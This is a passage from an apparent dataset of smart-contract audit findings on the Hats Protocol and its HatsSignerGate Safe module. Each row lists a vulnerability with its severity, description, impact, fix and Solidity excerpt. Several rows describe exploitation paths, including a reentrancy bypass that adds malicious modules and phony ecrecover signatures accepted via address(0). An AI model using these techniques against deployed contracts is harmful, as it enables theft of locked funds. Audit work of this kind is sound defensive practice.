accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.",```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n +"Other module can add owners to safe that push us above maxSigners, bricking safe",high,"If another module adds owners to the safe, these additions are not checked by our module or guard's logic. This can result in pushing us over `maxSigners`, which will cause all transactions to revert. In the case of an immutable hat, the only way to avoid the safe being locked permanently (with all funds frozen) may be to convince many hat wearers to renounce their hats.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, if there are other modules on the safe, they are able to add additional owners without these checks.\\nIn the case of `HatsSignerGate.sol`, there is no need to call `claimSigner()` to ""activate"" these owners. They will automatically be valid as long as they are a wearer of the correct hat.\\nThis could lead to an issue where many (more than maxSigners) wearers of an immutable hat are added to the safe as owners. Now, each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert.\\nWorse, there is nothing the admin can do about it. If they don't have control over the eligibility address for the hat, they are not able to burn the hats or transfer them.\\nThe safe will be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.","If `validSignerCount > maxSigners`, there should be some mechanism to reduce the number of signers rather than reverting.\\nAlternatively, as suggested in another issue, to get rid of all the potential risks of having other modules able to make changes outside of your module's logic, we should create the limit that the HatsSignerGate module can only exist on a safe with no other modules.",The safe can be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.,```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n +"If another module adds a module, the safe will be bricked",high,"If a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the ""before"" check uses `enabledModuleCount` and the ""after"" check uses `enabledModuleCount + 1`. The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the ""before"" check would clip off the final modules, and the ""after"" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the ""before"" and ""after"" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.","The module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.","The safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.","```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n" +Signers can bypass checks to add new modules to a safe by abusing reentrancy,high,"The `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Disfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will pass","Use a more typical reentrancy guard format, such as checking to ensure `_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.",Any number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.,"```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n" +"Unlinked tophat retains linkedTreeRequests, can be rugged",high,"When a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to ""takeover"" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a ""request"" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permission","In `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n","Tophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.","```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n" +Owners can be swapped even though they still wear their signer hats,medium,"`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n // rest of code\\n```\\n","Issue Owners can be swapped even though they still wear their signer hats\\nPerform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.",bypass restrictions and perform action that should be disallowed.,"```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n // rest of code\\n```\\n" +Unbound recursive function call can use unlimited gas and break hats operation,medium,"some of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 ""root hat"" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 ""root hat"" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.",code should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. (keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold),it won't be possible to perform actions for those hats and funds can be lost because of it.,"```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n" +The Hats contract needs to override the ERC1155.balanceOfBatch function,medium,"The Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, ""LENGTH_MISMATCH"");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\n",Consider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.,"This will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projects","```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n" +[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`,medium,"`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Lets imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. (4) In this case, while the number of `validSingerCount` increased, the `_removeSigner` reduces one.",Check if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\n,"This can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.",```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n +"Safe threshold can be set above target threshold, causing transactions to revert",medium,"If a `targetThreshold` is set below the safe's threshold, the `reconcileSignerCount()` function will fail to adjust the safe's threshold as it should, leading to a mismatch that causes all transactions to revert.\\nIt is possible and expected that the `targetThreshold` can be lowered, sometimes even lower than the current safe threshold.\\nIn the `setTargetThreshold()` function, there is an automatic update to lower the safe threshold accordingly. However, in the event that the `signerCount < 2`, it will not occur. This could easily happen if, for example, the hat is temporarily toggled off.\\nBut this should be fine! In this instance, when a new transaction is processed, `checkTransaction()` will be called, which calls `reconcileSignerCount()`. This should fix the problem by resetting the safe's threshold to be within the range of `minThreshold` to `targetThreshold`.\\nHowever, the logic to perform this update is faulty.\\n```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n\\nAs you can see, in the event that the `validSignerCount` is lower than the target threshold, we update the safe's threshold to `validSignerCount`. That is great.\\nIn the event that `validSignerCount` is greater than threshold, we should be setting the safe's threshold to `targetThreshold`. However, this only happens in the `else if` clause, when `currentThreshold < target`.\\nAs a result, in the situation where `target < current <= validSignerCount`, we will leave the current safe threshold as it is and not lower it. This results in a safe threshold that is greater than `targetThreshold`.\\nHere is a simple example:\\nvalid signers, target threshold, and safe's threshold are all 10\\nthe hat is toggled off\\nwe lower target threshold to 9\\nthe hat is toggled back on\\n`if` block above (validSignerCount <= target && validSignerCount != currentThreshold) fails because `validSignerCount > target`\\nelse `if` block above (validSignerCount > target && currentThreshold < target) fails because `currentThreshold > target`\\nas a result, `newThreshold == 0` and the safe isn't updated\\nthe safe's threshold remains at 10, which is greater than target threshold\\nIn the `checkAfterExecution()` function that is run after each transaction, there is a check that the threshold is valid:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nThe `_getCorrectThreshold()` function checks if the threshold is equal to the valid signer count, bounded by the `minThreshold` on the lower end, and the `targetThreshold` on the upper end:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nSince our threshold is greater than `targetThreshold` this check will fail and all transactions will revert.",Edit the if statement in `reconcileSignerCount()` to always lower to the `targetThreshold` if it exceeds it:\\n```\\n// Remove the line below\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n// Add the line below\\nif (validSignerCount <= target) {\\n newThreshold = validSignerCount;\\n// Remove the line below\\n} else if (validSignerCount > target && currentThreshold < target) {\\n// Add the line below\\n} else {\\n newThreshold = target;\\n}\\n// Remove the line below\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n// Add the line below\\nif (newThreshold != currentThreshold) { // rest of code update safe threshold // rest of code }\\n```\\n,"A simple change to the `targetThreshold` fails to propagate through to the safe's threshold, which causes all transactions to revert.",```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n +"If signer gate is deployed to safe with more than 5 existing modules, safe will be bricked",medium,"`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.","The `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != moduleWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\n","If a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.","```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n" +"If a hat is owned by address(0), phony signatures will be accepted by the safe",medium,"If a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. However, the result would be a free signer on the multisig, which would have dramatic consequences.",The easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.,"If a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.","```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n" +Swap Signer fails if final owner is invalid due to off by one error in loop,medium,"New users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number 